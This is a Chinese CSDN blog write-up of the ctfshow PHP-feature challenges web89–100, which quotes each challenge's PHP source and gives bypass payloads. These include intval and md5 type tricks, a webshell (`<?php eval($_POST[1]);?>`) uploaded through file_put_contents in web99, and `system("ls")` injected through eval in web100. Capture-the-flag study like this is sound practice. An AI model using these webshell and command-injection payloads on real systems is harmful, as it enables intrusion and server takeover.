ctfshow之web入门-php特性89-100

最新推荐文章于 2024-07-13 17:10:44 发布
最新推荐文章于 2024-07-13 17:10:44 发布
阅读量649 收藏
点赞数
文章标签: php web 字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47726676/article/details/116193093
版权

web89

if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }

不能是数字但又必须是数字
在intval()函数中, 空的 array 返回 0,非空的 array 返回 1。

?num[]

web90

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

该博客写的十分具体https://blog.csdn.net/weixin_45785288/article/details/111085520
如下的结果都为4476

intval('4476.0')    小数点  
intval('+4476.0')  正负号
intval('4476e0')    科学计数法
intval('0x117c')    16进制
intval('010574')    8进制
intval(' 010574')   8进制+空格

web91

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}

/i   #不区分大小写
/m   #换行匹配

直接用url编码绕过/m

ctfshow{21100577-eb04-4b0f-8337-36636326cab8}

web92

用十六进制绕过

?num=0x117c

web93

限制了字母,用八进制绕过

?num=010574

web94

不让用八进制绕过了,使用小数点

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }

?num=4476.0

web95

过滤了小数点,

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

使用intval(’ 010574’) 8进制+空格

?num=%20010574

web96

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}

查看当前文件夹下的flag.php

?u=./flag.php

web97

include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

有两种解法
解法一:md5()函数无法处理数组,传入的数组会返回NULL

a[]=1&b[]=2

在这里插入图片描述
第二种方法:MD5碰撞
很遗憾没实现,一直报URI malformed有小伙伴知道怎么做的可以评论一下

web98

include("flag.php");
$_GET?$_GET=&$_POST:'flag';                                #如果存在get请求,post就覆盖get
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';              
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);#GET传参HTTP_FLAG的值为flag

?>

由此构造POST

HTTP_FLAG=flag

随便GET一个东西,POST构造好的内容,得到flag
在这里插入图片描述

web99

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);}
?>

查看in_array() 函数用法
in_array() 函数搜索数组中是否存在指定的值。
注释:如果 search 参数是字符串且 type 参数被设置为 TRUE,则搜索区分大小写。

in_array(search,array,type)

在这里插入图片描述
说明
如果给定的值 search 存在于数组 array 中则返回 true。如果第三个参数设置为 true,函数只有在元素存在于数组中且数据类型与给定值相同时才返回 true。
如果没有在数组中找到参数,函数返回 false。
注释:如果 search 参数是字符串,且 type 参数设置为 true,则搜索区分大小写。
此处是弱类型
新加进去的随机数字每次都包含1,1存在的几率是最大的。

get:
?n=1.php
post:
content=<?php eval($_POST[1]);?>

在这里插入图片描述

访问1.php
提交shell命令
在这里插入图片描述
tac一下得到flag

WEB100

$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
}

part1

<?php
$a=true and false and false;
var_dump($a);  返回true

$a=true && false && false;
var_dump($a);  返回false

只要v1=1就可以进入下一部分
part2
构造v2与v3,该题没有过滤shell,直接获取

?v1=1&v2=system("ls")&v3=;

?v1=1&v2=var_dump(get_class_vars(‘ctfshow’))&v3=;

可惜最后结果想不到怎么转换在这里插入图片描述

JeremyHeria
关注
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web100(php特性)
m0_62094846的博客
01-14 1515
运算符优先级:&& > || > = > and > or is_numeric() 函数用于检测变量是否为数字或数字字符串。 是数字和数字字符串则返回 TRUE,否则返回 FALSE <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 20
ctfshow-web入门-php特性web100-web103)is_numeric 函数绕过
最新发布
Welcome To Myon'Blog !
07-13 1269
我们只需要构造输出 ctfshow 这个类即可。虽然逻辑运算符的优先级比赋值运算符要高,但是如果逻辑运算符和赋值运算符连用时,往往允许存在先进行赋值运算,后再进行逻辑运算的顺序。需要满足 if 语句才会进入后面的判断,因此要求 v0 为 1,这里用的是 and,所以只需要满足 v1是数字即可。要求 v2 中不能有分号,v3 中需要有分号。如果上述要求都满足,则会调用 eval 函数。代入 eval 函数实际就是执行:");
ctfshow—PHP特性
cosmoslin的博客
09-14 2395
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
CTFSHOW web入门 web100 wp
wei_xiao_zan的博客
05-22 1369
终于做到100题了!!! 咱就是说先看代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-21 22:10:28 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.p
CTFSHOW WEB89-100 PHP特性 详解
qq_49399033的博客
06-14 7623
CTFSHOW PHP特性做题笔记 详细学习
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow-Web 解题记录1
weicanh的博客
04-19 4674
ctfshow-Web 解题记录1
ctfshow php特性 web 89~150plus
shinygod的博客
03-07 746
目录web 92web 93web 94web 95web 96web 97web 98web 99web 100web 101web 102web 103web 104 web 92 num=0x117c intval($num,$base=0) //当base为0时,会自动检测num的进制 //例如:0x117c(16进制) == 4476(十进制) == 010574(8进制) web 93 在这里插入代码片 web 94 web 95 web 96 web 97 web 98 web 99 w
ctfshow php特性 web89-94
weixin_58519918的博客
04-19 2816
web89)【preg_match】 https://blog.51cto.com/lxw1844912514/3107686函数intval如果参数是字符串,则返回字符串中第一个不是数字的字符之前的数字串所代表的整数值。 preg_match函数表示运用正则来使用匹配函数。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer(整数) 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1...
ctfshow PHP特性89-115)【学习记录】
ximo的博客
02-17 581
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } intval() 函数用于获取变量的整数值。 但是要绕过正
BUU刷题Day7
姜小孩的博客
03-30 1913
[BJDCTF2020]Mark loves cat [安洵杯 2019]easy_web [NCTF2019]Fake XML cookbook MD5强碰撞 XXE
ctfshow php特性系列
xiaolong22333的博客
04-18 4740
文章目录web89web90web91web92web93web94web95web96web97web98 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)
ctf中的webPHP问题,Ctfshow Web入门 - PHP特性89-102)
weixin_28909295的博客
04-01 1096
Web89include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if(preg_match("/[0-9]/", $num)){die("no no no!");}if(intval($num)){echo $flag;}}num数组绕过?num[]=0Web90includ...
ctfshow-php特性
hungry1234的博客
03-07 952
大佬文章 intval 的绕过 正则匹配 sha1 和 md5 的绕过 php 运算符优先级 php://fliter 的各种过滤器 正则匹配的回溯 php 正则匹配最大回溯 linux 的 curl命令用法 无回显 rce 的总结 命令执行总结 本文中引用的所有文章都在上面了,感谢各位大佬! web96 if(isset($_GET['u'])){ if($_GET['u']=='flag.php'){ die("no no no"); }else{ h
ctfshow web97-100 php特性
qq_52671379的博客
03-28 567
ctfshow web97-php特性
ctfshow web入门 php特性
03-16
PHP是一种开源的服务器端脚本语言,主要用于网站开发。它支持多种数据库和操作系统,并且可以与HTML、CSS和JavaScript等语言结合使用。常用的特性包括变量、数组、循环、条件语句、函数、类和对象等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值